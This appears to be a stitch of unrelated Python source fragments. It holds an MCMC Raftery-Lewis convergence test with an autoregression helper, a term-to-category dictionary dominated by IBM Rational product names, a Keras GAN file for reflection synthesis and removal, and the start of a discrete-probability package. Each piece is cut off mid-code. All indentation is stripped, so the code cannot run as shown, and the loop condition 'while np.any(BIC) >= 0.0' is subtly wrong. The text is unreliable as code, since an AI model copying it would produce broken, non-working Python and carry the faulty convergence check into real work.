>>> test = mcmc.RafteryLewis()
>>> # passed, stats = test(X)
>>> # passed
"""
def __init__(self, q=0.025, r=0.005, s=0.95, eps=0.001, test_threshold=5.0,
axis=0):
super(RafteryLewis, self).__init__(discard_prop=0.0)
self.q = max(0.0, min(float(q), 1.0))
self.r = max(0.0, min(float(r), 1.0))
self.s = max(0.0, min(float(s), 1.0))
self.eps = max(consts.TOLERANCE, float(eps))
self.test_threshold = max(1.0, float(test_threshold))
self.axis = int(axis)
def test(self, X):
"""Performs the test and computes test statistics.
Arguments
---------
X : numpy.array
The data to test. One of the dimensions (``axis``) corresponds to
the samples from a Markov chain, and the other dimensions
represents different chains (e.g. separate chains and/or different
parameters).
Returns
-------
test_result : bool
Whether the test says the chain has converged or not. For multiple
parameters, returns True only if the chains have all converged.
statistics : dict
Test statistics. A dict with numpy arrays will be returned where
each element of the array corresponds to the statistics for each
different chain. If one-dimensional, the test statistics will be
returned directly in the dict.
"""
N = X.shape[self.axis]
phi = stat.norm.ppf(0.5 * (1.0 + self.s))
N_min = int(np.ceil(self.q * (1.0 - self.q) * (phi / self.r)**2) + 0.5)
if N_min > N:
raise ValueError("Too few samples (%d = N_min > N = %d). The "
"model can not be computed." % (N_min, N))
qhat = np.percentile(X, self.q, axis=self.axis)
axes = list(range(X.ndim))
axes[0] = self.axis
axes[self.axis] = 0
Z = np.transpose(np.transpose(X, axes=axes) <= qhat,
axes=axes).astype(int)
# Estimate transition matrix and G2 statistic
k = 0
BIC = 1.0
chain_ind = np.arange(qhat.size)
dim = [slice(None)] * X.ndim
while np.any(BIC) >= 0.0:
k = k + 1
dim[self.axis] = slice(0, N, k)
test_chain = Z[dim]
test_N = test_chain.shape[self.axis]
if test_N < 3:
raise ValueError("Too few samples. The model can not be "
"computed.")
# Compute transition matrix
# P3 = np.zeros((chain_ind.size, 2, 2, 2))
# dimZ = [slice(None)] * Z.ndim
# for i in range(2, N):
# dimZ[self.axis] = i - 2
# i0 = Z[dimZ].ravel()
# dimZ[self.axis] = i - 1
# i1 = Z[dimZ].ravel()
# dimZ[self.axis] = i - 0
# i2 = Z[dimZ].ravel()
#
# P3[chain_ind, i0, i1, i2] += 1
# TODO: Check if numpy.unique works here instead.
dim0 = [slice(None)] * Z.ndim
dim0[self.axis] = slice(0, N - 2)
dim1 = [slice(None)] * Z.ndim
dim1[self.axis] = slice(1, N - 1)
dim2 = [slice(None)] * Z.ndim
dim2[self.axis] = slice(2, N - 0)
temp = Z[dim0] + 2 * Z[dim1] + 4 * Z[dim2]
P3 = np.zeros((chain_ind.size, 2, 2, 2)) # Transition matrix
i = 0
for i1 in range(2):
for i2 in range(2):
for i3 in range(2):
P3[:, i1, i2, i3] = np.sum(temp == i, axis=self.axis).ravel()
i += 1
g2 = 0.0
for i1 in range(2):
for i2 in range(2):
for i3 in range(2):
if np.any(P3[:, i1, i2, i3] > 0):
fitted = np.divide((P3[:, i1, i2, 0] + P3[:, i1, i2, 1])
* (P3[:, 0, i2, i3] + P3[:, 1, i2, i3]),
(P3[:, 0, i2, 0]
+ P3[:, 0, i2, 1]
+ P3[:, 1, i2, 0]
+ P3[:, 1, i2, 1]))
focus = P3[:, i1, i2, i3]
g2 += np.multiply(np.log(np.divide(focus, fitted)),
focus)
g2 *= 2.0
BIC = g2 - np.log(test_N - 2) * 2.0
# TODO: Compare the two approaches to compute P2 and P3 with different
# sized data.
# Compute transition matrix
P2 = np.zeros((chain_ind.size, 2, 2))
dimZ = [slice(None)] * Z.ndim
for i in range(1, N):
dimZ[self.axis] = i - 1
i0 = Z[dimZ].ravel()
dimZ[self.axis] = i - 0
i1 = Z[dimZ].ravel()
P2[chain_ind, i0, i1] += 1
# dim0 = [slice(None)] * Z.ndim
# dim0[self.axis] = slice(0, N - 1)
# dim1 = [slice(None)] * Z.ndim
# dim1[self.axis] = slice(1, N - 0)
# temp = Z[dim0] + 2 * Z[dim1]
# P2 = np.zeros((chain_ind.size, 2, 2)) # Transition matrix
# i = 0
# for i1 in range(2):
# for i2 in range(2):
# P2[:, i1, i2] = np.sum(temp == i, axis=self.axis).ravel()
# i += 1
alpha = np.divide(P2[:, 0, 1], P2[:, 0, 0] + P2[:, 0, 1])
beta = np.divide(P2[:, 1, 0], P2[:, 1, 0] + P2[:, 1, 1])
alpha = alpha.reshape(qhat.shape)
beta = beta.reshape(qhat.shape)
alpha_beta = alpha + beta
m = np.divide(np.log(np.divide(self.eps * alpha_beta,
np.maximum(alpha, beta))),
np.log(np.absolute(1.0 - alpha_beta)))
m = (np.ceil(m) + 0.5).astype(int)
M = m * k
n = np.divide(np.multiply(np.multiply(alpha, beta), 2.0 - alpha_beta),
alpha_beta**3.0) / ((self.r / phi)**2.0)
n = (np.ceil(n) + 0.5).astype(int)
N = n * k
I = (M + N) / N_min # Dependence factor
passed = I < self.test_threshold
statistics = {"tests_passed": passed, # If the chains have converged.
"I": I, # Test statistic, the dependence factor.
"k": k, # Thinning
"M": M, # Burn-in
"N": N, # Number of required samples after burn-in.
"N_min": N_min} # The minimum required number of samples
return np.all(passed), statistics
def autoregression(X, p=2, lag=1, axis=0, unbiased=True, mean=True):
"""Computes the autoregression coefficients, AR(p), from time-series data.
Arguments
---------
X : numpy.array
The time-series to compute the autoregression coefficients for. The
number of elements along the given axis should be at least ten, for the
results to be meaningful, and greater than ``p`` for the model to be
computed at all.
p : int
Positive int. The order of the autoregression model, i.e. the number of
coefficients to return. Default is 2.
lag : int
Positive int. The time lag to use. Default is 1.
axis : int
The axis along which to compute the autoregression coefficients.
Default is 0, it is computed for all other axes simultaneously along
axis 0.
unbiased : bool
Whether to compute an unbiased model, or a biased one. The unbiased
model may be sensitive to noise. Default is True, compute the unbiased
model.
mean : bool
Whether to subtract the mean of the time-series or not. Default is
True, subtract the mean.
Returns
-------
phi : numpy.array
The autoregression coefficients, computed along ``axis``.
sigma2 : float
The variance of the noise in the time-series, computed along ``axis``.
References
----------
<NAME>. "The Yule Walker Equations for the AR Coefficients".
Technical report. Retrieved August 8, 2017, from:
http://www-stat.wharton.upenn.edu/~steele/Courses/956/ResourceDetails/YWSourceFiles/YW-Eshel.pdf
Wikipedia contributors (2017), "Autoregressive model". Wikipedia: The Free
Encyclopedia. Wikimedia Foundation, Inc. Retrieved August 8, 2017, from:
https://en.wikipedia.org/wiki/Autoregressive_model.
Wikipedia contributors (2017), "Autocorrelation". Wikipedia: The Free
Encyclopedia. Wikimedia Foundation, Inc. Retrieved August 8, 2017, from:
https://en.wikipedia.org/wiki/Autocorrelation.
"""
axis = int(axis)
if (axis < -X.ndim) or (axis >= X.ndim):
raise ValueError("The provided axis is not present.")
N = X.shape[axis]
if N <= p:
raise ValueError("Too few samples. The model can not be computed.")
if N < 10:
import warnings
warnings.warn("Too few samples for the model to be meaningful "
"(N < 10).")
p = max(1, min(int(p), N))
lag = max(1, min(int(lag), N - 1)) - 1 # Zero-based, so smallest is zero
unbiased = bool(unbiased)
mean = bool(mean)
if mean:
mu = np.mean(X, | |
ada embedded developer enterprise edition': ['rational ada'],
'rational apex': ['rational'],
'rational application': ['rational'],
'rational application developer': ['rational application'],
'rational application developer for websphere': ['rational application'],
'rational application developer for websphere software': [ 'rational '
'application'],
'rational asset': ['rational'],
'rational asset analyzer': ['rational asset'],
'rational asset analyzer for system': ['rational asset'],
'rational asset analyzer for system z': ['rational asset'],
'rational asset manager': ['rational asset'],
'rational automation': ['rational'],
'rational automation framework': ['rational automation'],
'rational automation framework for websphere': ['rational automation'],
'rational build': ['rational'],
'rational build forge': ['rational build'],
'rational build forge family': ['rational build'],
'rational business developer': ['rational'],
'rational change': ['rational'],
'rational clearcase': ['rational'],
'rational clearcase change': ['rational clearcase'],
'rational clearcase change management solution enterprise edition': [ 'rational '
'clearcase'],
'rational clearcase lt': ['rational clearcase'],
'rational clearcase multisite': ['rational clearcase'],
'rational clearddts': ['rational'],
'rational clearquest': ['rational'],
'rational clearquest and functional': ['rational clearquest'],
'rational clearquest and functional testing': ['rational clearquest'],
'rational clearquest multisite': ['rational clearquest'],
'rational cobol': ['rational'],
'rational cobol generation': ['rational cobol'],
'rational cobol generation extension': ['rational cobol'],
'rational cobol generation extension for zseries': ['rational cobol'],
'rational cobol runtime': ['rational cobol'],
'rational cobol runtime for zseries': ['rational cobol'],
'rational computer': ['rational'],
'rational computer based': ['rational computer'],
'rational computer based training': ['rational computer'],
'rational dashboard': ['rational'],
'rational data': ['rational'],
'rational data and application': ['rational data'],
'rational data and application modeling': ['rational data'],
'rational data and application modeling bundle': ['rational data'],
'rational developer': ['rational'],
'rational developer for i for soa construction': ['rational developer'],
'rational developer for power systems software': ['rational developer'],
'rational developer for system': ['rational developer'],
'rational developer for system z': ['rational developer'],
'rational development': ['rational'],
'rational development and test': ['rational development'],
'rational development and test environment for system z': [ 'rational '
'development'],
'rational development studio': ['rational development'],
'rational development studio for i': ['rational development'],
'rational doors': ['rational'],
'rational doors analyst': ['rational doors'],
'rational doors analyst add': ['rational doors'],
'rational doors web': ['rational doors'],
'rational doors web access': ['rational doors'],
'rational elite': ['rational'],
'rational elite support': ['rational elite'],
'rational elite support for eclipse': ['rational elite'],
'rational elite support for mainsoft': ['rational elite'],
'rational elite support for mainsoft document collaboration for rational jazz': [ 'rational '
'elite'],
'rational engineering': ['rational'],
'rational engineering lifecycle': ['rational engineering'],
'rational engineering lifecycle manager': ['rational engineering'],
'rational focal point': ['rational'],
'rational functional': ['rational'],
'rational functional tester': ['rational functional'],
'rational functional tester plus': ['rational functional'],
'rational host': ['rational'],
'rational host access': ['rational host'],
'rational host access transformation': ['rational host'],
'rational host access transformation services': ['rational host'],
'rational host integration': ['rational host'],
'rational host integration solution': ['rational host'],
'rational host on-demand': ['rational host'],
'rational insight': ['rational'],
'rational lifecycle': ['rational'],
'rational lifecycle integration': ['rational lifecycle'],
'rational lifecycle integration adapters': ['rational lifecycle'],
'rational lifecycle package': ['rational lifecycle'],
'rational lifecycle package with clearcase': ['rational lifecycle'],
'rational logiscope': ['rational'],
'rational manual tester': ['rational'],
'rational method composer': ['rational'],
'rational modeling': ['rational'],
'rational modeling extension': ['rational modeling'],
'rational modeling extension for microsoft': ['rational modeling'],
'rational modeling extension for microsoft .net': ['rational modeling'],
'rational open': ['rational'],
'rational open access': ['rational open'],
'rational open access rpg': ['rational open'],
'rational open access rpg edition': ['rational open'],
'rational performance': ['rational'],
'rational performance test': ['rational performance'],
'rational performance test server': ['rational performance'],
'rational performance tester': ['rational performance'],
'rational policy': ['rational'],
'rational policy tester': ['rational policy'],
'rational policy tester family': ['rational policy'],
'rational portfolio manager': ['rational'],
'rational professional bundle': ['rational'],
'rational programming patterns': ['rational'],
'rational project conductor': ['rational'],
'rational projectconsole': ['rational'],
'rational publishing engine': ['rational'],
'rational purify': ['rational'],
'rational purify family': ['rational purify'],
'rational purify for linux': ['rational purify'],
'rational purify for linux and unix': ['rational purify'],
'rational purify for windows': ['rational purify'],
'rational purifyplus': ['rational'],
'rational purifyplus enterprise': ['rational purifyplus'],
'rational purifyplus enterprise edition': ['rational purifyplus'],
'rational purifyplus family': ['rational purifyplus'],
'rational purifyplus for linux': ['rational purifyplus'],
'rational purifyplus for linux and unix': ['rational purifyplus'],
'rational purifyplus for windows': ['rational purifyplus'],
'rational quality': ['rational'],
'rational quality manager': ['rational quality'],
'rational quality manager family': ['rational quality'],
'rational quality manager standard': ['rational quality'],
'rational quality manager standard edition': ['rational quality'],
'rational requirements composer': ['rational'],
'rational requisitepro': ['rational'],
'rational rhapsody family': ['rational'],
'rational robot': ['rational'],
'rational rose': ['rational'],
'rational rose data': ['rational rose'],
'rational rose data modeler': ['rational rose'],
'rational rose developer': ['rational rose'],
'rational rose developer for java': ['rational rose'],
'rational rose developer for unix': ['rational rose'],
'rational rose developer for visual studio': ['rational rose'],
'rational rose enterprise': ['rational rose'],
'rational rose family': ['rational rose'],
'rational rose modeler': ['rational rose'],
'rational rose technical': ['rational rose'],
'rational rose technical developer': ['rational rose'],
'rational sdl suite': ['rational'],
'rational service': ['rational'],
'rational service tester': ['rational service'],
'rational service tester for soa': ['rational service'],
'rational service tester for soa quality': ['rational service'],
'rational soda': ['rational'],
'rational software': ['rational'],
'rational software analyzer': ['rational software'],
'rational software analyzer developer': ['rational software'],
'rational software analyzer developer edition': ['rational software'],
'rational software analyzer enterprise': ['rational software'],
'rational software analyzer enterprise edition': ['rational software'],
'rational software analyzer family': ['rational software'],
'rational software architect': ['rational software'],
'rational software architect design': ['rational software'],
'rational software architect design manager': ['rational software'],
'rational software architect for websphere': ['rational software'],
'rational software architect for websphere software': ['rational software'],
'rational software architect realtime': ['rational software'],
'rational software architect realtime edition': ['rational software'],
'rational software architect standard': ['rational software'],
'rational software architect standard edition': ['rational software'],
'rational software modeler': ['rational software'],
'rational statemate': ['rational'],
'rational suite': ['rational'],
'rational suite developmentstudio': ['rational suite'],
'rational suite developmentstudio for unix': ['rational suite'],
'rational suite for technical': ['rational suite'],
'rational suite for technical developers': ['rational suite'],
'rational synergy': ['rational'],
'rational system': ['rational'],
'rational system architect': ['rational system'],
'rational system architect xt': ['rational system'],
'rational systems': ['rational'],
'rational systems developer': ['rational systems'],
'rational systems tester': ['rational systems'],
'rational tau': ['rational'],
'rational team': ['rational'],
'rational team concert': ['rational team'],
'rational team concert express': ['rational team'],
'rational team concert express-c': ['rational team'],
'rational team concert for i': ['rational team'],
'rational team concert for i express': ['rational team'],
'rational team concert for i express edition': ['rational team'],
'rational team concert for i standard': ['rational team'],
'rational team concert for i standard edition': ['rational team'],
'rational team concert for power': ['rational team'],
'rational team concert for power systems': ['rational team'],
'rational team concert for power systems software': ['rational team'],
'rational team concert for system': ['rational team'],
'rational team concert for system z': ['rational team'],
'rational team concert standard': ['rational team'],
'rational team unifying': ['rational team'],
'rational team unifying platform': ['rational team'],
'rational team webtop': ['rational team'],
'rational test': ['rational'],
'rational test realtime': ['rational test'],
'rational test virtualization': ['rational test'],
'rational test virtualization server': ['rational test'],
'rational test workbench': ['rational test'],
'rational testmanager': ['rational'],
'rational transformation workbench': ['rational'],
'rational ttcn suite': ['rational'],
'rational visual test': ['rational'],
'rational web': ['rational'],
'rational web developer': ['rational web'],
'rational web developer for websphere': ['rational web'],
'rational web developer for websphere software': ['rational web'],
'raytheon': ['company'],
'rdf': ['programming language'],
'rdfs': ['programming language'],
'rds': ['database'],
'reactjs': ['javascript'],
'readable medium': ['medium'],
'real time operating system': ['operating system'],
'realistic': ['state'],
'reasonable prices': ['customer oriented'],
'reciprocal averaging': ['linear dimension reduction model'],
'recognition': ['activity'],
'recommendation systems': ['machine learning'],
'recovery': ['activity'],
'recruiter': ['individual role'],
'recruiting': ['activity'],
'recruiting document': ['document'],
'recruiting role': ['individual role'],
'recruitment strategy': ['individual role'],
'recruitment system': ['document'],
'recurrent neural networks': ['nueral networks'],
'red hat': ['cloud skill'],
'red hat architect': ['cloud architect'],
'red hat commercial databases modernization': [ 'red hat databases '
'modernization'],
'red hat commercial middleware': ['red hat'],
'red hat commercial middleware modernization': [ 'red hat middleware '
'modernization'],
'red hat databases modernization': ['databases modernization'],
'red hat developer': ['cloud developer'],
'red hat devops': ['virtualization infrastructure'],
'red hat jboss': ['redhat virtualization'],
'red hat microsoft apps modernization': ['apps modernization'],
'red hat middleware architect': ['red hat architect'],
'red hat middleware modernization': ['middleware modernization'],
'red hat open source': ['red hat'],
'red hat open source databases modernization': [ 'red hat databases '
| |
from Network.component import Component
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow import keras
from Network.component import PerceptionRemovalModelComponent, BidirectionalRemovalComponent, \
MisalignedRemovalComponent, BeyondLinearityComponent, InfoGComponent, EncoderDecoderRemovalComponent
class Network:
"""
This class implements nn models' architecture for the Reflection-Enhancement-gan
@Author: <NAME>
@Date: 2020.11.05
"""
@staticmethod
def build_modal_encoder(img_size=256, code_dim=32):
"""
reflection modal encoder, which encodes [r, rb] -> low-dim latent code
:param img_size: the image size
:return: tf.Model
"""
input_layer = keras.layers.Input(shape=(img_size, img_size, 3 + 3))
# 256
ds1 = Component.get_conv_block(3 + 3, 32, norm=False)(input_layer)
# 128
ds2 = Component.get_conv_block(32, 64)(ds1)
# 64
ds3 = Component.get_conv_block(64, 128)(ds2)
# 32
ds4 = Component.get_conv_block(128, 256)(ds3)
# 16 * 16 * 4
ds5 = Component.get_conv_block(256, 256)(ds4)
# 8 * 8 * 4
ds6 = Component.get_conv_block(256, 4)(ds5)
flat = layers.Flatten()(ds6)
out = layers.Dense(code_dim)(flat)
return keras.Model(input_layer, out)
@staticmethod
def build_modal_decoder(img_size=256):
"""
reflection modal decoder, which accepts [code_dim, ]
:param img_size:
:return:
"""
pass
@staticmethod
def build_simple_G(img_size=256, noise_dim=1):
"""
build a simple generator for the regan.
:param img_size:
:return:
"""
input_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + noise_dim))
inp, noise = tf.split(input_layer, [3, noise_dim], axis=3)
# 256 -> 128
ds1 = Component.get_conv_block(noise_dim, 128)(noise)
# 128 -> 64
ds2 = Component.get_conv_block(128, 256)(ds1)
# 64 -> (32, 32, 128) (32, 32, 3, 3)
ds3 = Component.get_conv_block(256, 64)(ds2)
ds4 = Component.get_conv_block(64, 1)(ds3)
fl = layers.Flatten()(ds4)
ker = layers.Dense(32 * 32 * 3 * 3, activation='relu')(fl)
# mask: 256, 256
mask = Component.get_deconv_block(128, 3)(ds1)
kernel = tf.reshape(ker, [32, 32, 3, 3])
blurred_R = tf.nn.conv2d(inp, kernel, strides=[1, 1, 1, 1], padding='SAME')
blurred_R = layers.multiply([blurred_R, mask])
return keras.Model(input_layer, blurred_R)
@staticmethod
def build_multimodal_D(img_size=256):
"""
build the discriminator model for multi-modal gan.
:param img_size: image size for synthetic image S and noise
:return: two tf.keras.Model objects.
"""
input_layer = tf.keras.layers.Input(shape=(img_size, img_size, 6))
d1 = tf.keras.Sequential([tf.keras.layers.AveragePooling2D(pool_size=(3, 3), strides=2),
Component.get_conv_block(6, 32, norm=False),
Component.get_conv_block(32, 64),
Component.get_conv_block(64, 128),
Component.get_conv_block(128, 256, s=1),
Component.get_conv_block(256, 1, s=1, norm=False, non_linear='none')
])
d2 = tf.keras.Sequential([Component.get_conv_block(6, 64, norm=False),
Component.get_conv_block(64, 128),
Component.get_conv_block(128, 256),
Component.get_conv_block(256, 1, norm=False, non_linear='none')])
out1 = d1(input_layer)
out2 = d2(input_layer)
return tf.keras.Model(input_layer, (out1, out2))
@staticmethod
def build_multimodal_G(img_size=256, noise_dim=4):
"""
build the generator model
:param img_size: image size for reflection image R, transmission layer T
:param noise_dim: noise_dim to concat with the input image (T, R)
:return: tf.keras.Model object. The generator model accept a 4-D tensor with the shape
(Batch_size, img_size, img_size, 3 + 3 + noise_dim)
noted that channel 3 + 3 means the RGB channels for image T and R
channel noise_dim means the noise channel
"""
in_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + noise_dim))
ds1 = Component.get_conv_block(3 + noise_dim, 32, norm=False)(in_layer)
ds2 = Component.get_conv_block(32, 64)(ds1)
ds3 = Component.get_conv_block(64, 128)(ds2)
ds4 = Component.get_conv_block(128, 256)(ds3)
ds5 = Component.get_conv_block(256, 256)(ds4)
ds6 = Component.get_conv_block(256, 256)(ds5)
us1 = Component.get_deconv_block(256, 256)(ds6)
us2 = Component.get_deconv_block(512, 256)(tf.concat([us1, ds5], axis=3))
us3 = Component.get_deconv_block(512, 128)(tf.concat([us2, ds4], axis=3))
us4 = Component.get_deconv_block(256, 64)(tf.concat([us3, ds3], axis=3))
us5 = Component.get_deconv_block(128, 32)(tf.concat([us4, ds2], axis=3))
out_layer = Component.get_deconv_block(64, 3, norm=False, non_linear='tanh')(tf.concat([us5, ds1], axis=3))
return tf.keras.Model(in_layer, out_layer)
@staticmethod
def build_optical_synthesis_generator(img_size=256, noise_dim=4):
"""
build the generator model that use the conventional reflection synthetic model.
the generator with the optical synthesis prior will only accept a noise-map from the encoder and convert it to
an (1) alpha blending mask for fusing the transmission layer T and reflection layer R. (2) convolution kernel
that blurs the reflection layer
:param img_size: image size for reflection image R, transmission layer T
:param noise_dim: noise_dim to concat with the input image (T, R)
:return: tf.keras.Model object. The generator model accepts three 4-D tensors: (1) T. (2) R. (3) noise layer.
The generator model will output two tensors:
(1) [alpha_blending_mask] with (256, 256, 3) for mixing two layers.
(2) [conv-kernel] used for blurring the reflection layer.
"""
in_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + 3 + noise_dim))
# noise_in = tf.keras.layers.Input(shape=(img_size, img_size, noise_dim))
# T_in = tf.keras.layers.Input(shape=(img_size, img_size, 3))
# R_in = tf.keras.layers.Input(shape=(img_size, img_size, 3))
# split the input tensor
T_in, R_in, noise_in = tf.split(in_layer, [3, 3, noise_dim], axis=3)
ds1 = Component.get_conv_block(noise_dim, 32, norm=False)(noise_in)
ds2 = Component.get_conv_block(32, 64)(ds1)
ds3 = Component.get_conv_block(64, 128)(ds2) # d3: (32, 32)
ds4 = Component.get_conv_block(128, 256)(ds3)
ds5 = Component.get_conv_block(256, 256)(ds4)
ds6 = Component.get_conv_block(256, 256)(ds5)
us1 = Component.get_deconv_block(256, 256)(ds6)
us2 = Component.get_deconv_block(512, 256)(tf.concat([us1, ds5], axis=3))
us3 = Component.get_deconv_block(512, 128)(tf.concat([us2, ds4], axis=3))
us4 = Component.get_deconv_block(256, 64)(tf.concat([us3, ds3], axis=3)) # us4: (64, 64, 64)
us5 = Component.get_deconv_block(128, 32)(tf.concat([us4, ds2], axis=3)) # us5: (128, 128, 32)
# let us handle the conv kernel first
# us5 ---conv--- (32, 32, 16) ---reshape---> (32, 32, 3, 3)
# (1, 128, 128, 32) -> (1, 64, 64, 16)
down1 = Component.get_conv_block(32, 16)(us5)
# (1, 64, 64, 16) -> (1, 32, 32, 9)
down2 = Component.get_conv_block(16, 9)(down1)
kernel = tf.reshape(down2, [32, 32, 3, 3])
# the alpha blending mask
alpha_mask = Component.get_deconv_block(64, 3, norm=False, non_linear='leaky_relu')(
tf.concat([us5, ds1], axis=3))
alpha_mask_sub = layers.subtract([tf.ones_like(alpha_mask), alpha_mask])
# alpha_mask_sub = Component.get_deconv_block(64, 3, norm=False, non_linear='leaky_relu')(
# tf.concat([us5, ds1], axis=3))
# the blurring kernel
blurred_R = tf.nn.conv2d(R_in, kernel, strides=[1, 1, 1, 1], padding='SAME')
# transmission
t_layer = layers.multiply([T_in, alpha_mask])
r_layer = layers.multiply([blurred_R, alpha_mask_sub])
out = layers.add([t_layer, r_layer])
return tf.keras.Model(in_layer, out)
@staticmethod
def build_generator(img_size=256, noise_dim=4):
"""
build the generator model
:param img_size: image size for reflection image R, transmission layer T
:param noise_dim: noise_dim to concat with the input image (T, R)
:return: tf.keras.Model object. The generator model accept a 4-D tensor with the shape
(Batch_size, img_size, img_size, 3 + 3 + noise_dim)
noted that channel 3 + 3 means the RGB channels for image T and R
channel noise_dim means the noise channel
"""
in_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + 3 + noise_dim))
ds1 = Component.get_conv_block(3 + 3 + noise_dim, 32, norm=False)(in_layer)
ds2 = Component.get_conv_block(32, 64)(ds1)
ds3 = Component.get_conv_block(64, 128)(ds2)
ds4 = Component.get_conv_block(128, 256)(ds3)
ds5 = Component.get_conv_block(256, 256)(ds4)
ds6 = Component.get_conv_block(256, 256)(ds5)
us1 = Component.get_deconv_block(256, 256)(ds6)
us2 = Component.get_deconv_block(512, 256)(tf.concat([us1, ds5], axis=3))
us3 = Component.get_deconv_block(512, 128)(tf.concat([us2, ds4], axis=3))
us4 = Component.get_deconv_block(256, 64)(tf.concat([us3, ds3], axis=3))
us5 = Component.get_deconv_block(128, 32)(tf.concat([us4, ds2], axis=3))
out_layer = Component.get_deconv_block(64, 3, norm=False, non_linear='tanh')(tf.concat([us5, ds1], axis=3))
return tf.keras.Model(in_layer, out_layer)
@staticmethod
def build_discriminator(img_size=256):
"""
build the discriminator model for regan.
:param img_size: image size for synthetic image S
:return: two tf.keras.Model objects.
"""
input_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3))
d1 = tf.keras.Sequential([tf.keras.layers.AveragePooling2D(pool_size=(3, 3), strides=2),
Component.get_conv_block(3, 32, norm=False),
Component.get_conv_block(32, 64),
Component.get_conv_block(64, 128),
Component.get_conv_block(128, 256, s=1),
Component.get_conv_block(256, 1, s=1, norm=False, non_linear='none')
])
d2 = tf.keras.Sequential([Component.get_conv_block(3, 64, norm=False),
Component.get_conv_block(64, 128),
Component.get_conv_block(128, 256),
Component.get_conv_block(256, 1, norm=False, non_linear='none')])
out1 = d1(input_layer)
out2 = d2(input_layer)
return tf.keras.Model(input_layer, (out1, out2))
@staticmethod
def build_encoder(img_size=256, noise_dim=4):
"""
build the encoder model for regan.
:param img_size: image size for synthetic image S, transmission layer T and reflection layer R.
:param noise_dim: noise dimension that the encoder will predict.
:return: tf.keras.Model objects.
"""
input_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + 3 + 3))
conv = tf.keras.layers.Conv2D(64, kernel_size=4, strides=2, padding='same')
res_block = tf.keras.Sequential([Component.get_res_block(64, 128),
Component.get_res_block(128, 192),
Component.get_res_block(192, 256),
Component.get_res_block(256, 256)])
pool_block = tf.keras.Sequential([tf.keras.layers.LeakyReLU(),
tf.keras.layers.AveragePooling2D(pool_size=(8, 8), padding='same')])
flatten = tf.keras.layers.Flatten()
fc_mu = tf.keras.layers.Dense(noise_dim)
fc_logvar = tf.keras.layers.Dense(noise_dim)
out = conv(input_layer)
out = res_block(out)
out = pool_block(out)
out = flatten(out)
mu = fc_mu(out)
log_var = fc_logvar(out)
return tf.keras.Model(input_layer, (mu, log_var))
class PerceptionRemovalNetworks:
@staticmethod
def build_discriminator(img_size=256):
model = keras.Sequential()
model.add(layers.InputLayer(input_shape=(None, None, 6)))
# layer 1
model.add(PerceptionRemovalModelComponent.get_conv_block(64, 2, non_linear='leaky_relu'))
# layer 2
model.add(PerceptionRemovalModelComponent.get_conv_block(128, 2, non_linear='leaky_relu'))
# layer 3
model.add(PerceptionRemovalModelComponent.get_conv_block(256, 2, non_linear='leaky_relu'))
# layer 4
model.add(PerceptionRemovalModelComponent.get_conv_block(512, 1, non_linear='leaky_relu'))
# final layer
model.add(layers.ZeroPadding2D(padding=(1, 1)))
model.add(layers.Conv2D(filters=1, kernel_size=(4, 4), strides=(1, 1), kernel_initializer=keras.
initializers.random_normal(0, 0.02), activation='sigmoid'))
return model
@staticmethod
def build_rm_model():
inputs = keras.Input(shape=(None, None, 1475), name="image_input")
model = keras.Sequential()
model.add(inputs)
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(1, 1))
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 1))
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 2))
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 4))
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 8))
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 16))
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 32))
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 64))
model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 1))
model.add(layers.Conv2D(filters=6, kernel_size=(1, 1), padding='same'))
return model
class BidirectionalRemovalNetworks:
@staticmethod
def build_vanilla_generator():
inputs = keras.Input(shape=(256, 256, 3))
# the input layer
x = layers.Conv2D(filters=64, kernel_size=(4, 4), padding='same')(inputs)
x = layers.LeakyReLU()(x)
c1 = BidirectionalRemovalComponent.get_conv_block(512, 2)(x)
c2 = BidirectionalRemovalComponent.get_conv_block(256, 2)(c1)
c3 = BidirectionalRemovalComponent.get_conv_block(128, 2)(c2)
c4 = BidirectionalRemovalComponent.get_conv_block(64, 2)(c3)
c5 = BidirectionalRemovalComponent.get_conv_block(32, 2)(c4)
c6 = BidirectionalRemovalComponent.get_conv_block(16, 2)(c5)
c7 = BidirectionalRemovalComponent.get_conv_block(8, 2)(c6)
d1 = BidirectionalRemovalComponent.get_deconv_block(8, 2)(c7)
| |
<filename>discrete_probability/__init__.py
__version__ = '0.10dev-8f143b8'
from collections import namedtuple
from decimal import Decimal
from math import log
from random import random, randint
from sys import float_info
################################################################################
# Utilities
################################################################################
def weighted_choose(weighted_choices):
x = random()
for weight, choice in weighted_choices:
if x <= weight:
return choice
x -= weight
raise ValueError('Total probability of choices does not sum to one.')
def data_to_assignments(header, samples):
sample_assignments = []
for sample in samples:
single_assignment_tuples = filter(lambda x: not x[1] == None, zip(header, sample))
single_assignments = [SingleAssignment(variable, value) for variable, value in single_assignment_tuples]
sample_assignment = Assignment(single_assignments)
sample_assignments.append(sample_assignment)
return sample_assignments
class Query():
def __init__(self, query, given=[]):
self._query = query
self._given = given
self._update()
def __str__(self):
return '{:} | {:}'.format(', '.join([str(x) for x in self._query]), ', '.join([str(x) for x in self._given]))
def __repr__(self):
return str(self)
def get_query(self):
return self._query
def set_query(self, value):
self._query = value
self._update()
query = property(get_query, set_query)
def get_given(self):
return self._given
def set_given(self, value):
self._given = value
self._update()
given = property(get_given, set_given)
def _update(self):
self.query_vars = map(lambda x: x if isinstance(x, Variable) else x.variable, self._query)
self.given_vars = map(lambda x: x if isinstance(x, Variable) else x.variable, self._given)
self.is_marginal_query = len(filter(lambda x: isinstance(x, Variable), self._query)) > 0
self.is_conditional_query = len(self._given) > 0
self.is_full_conditional_query = len(filter(lambda x: isinstance(x, Variable), self.given)) > 0
@staticmethod
def from_natural(*args):
args = list(args)
query = []
given = []
separator_index = filter(lambda x: not (isinstance(x[1], SingleAssignment) or isinstance(x[1], Variable)), enumerate(args))
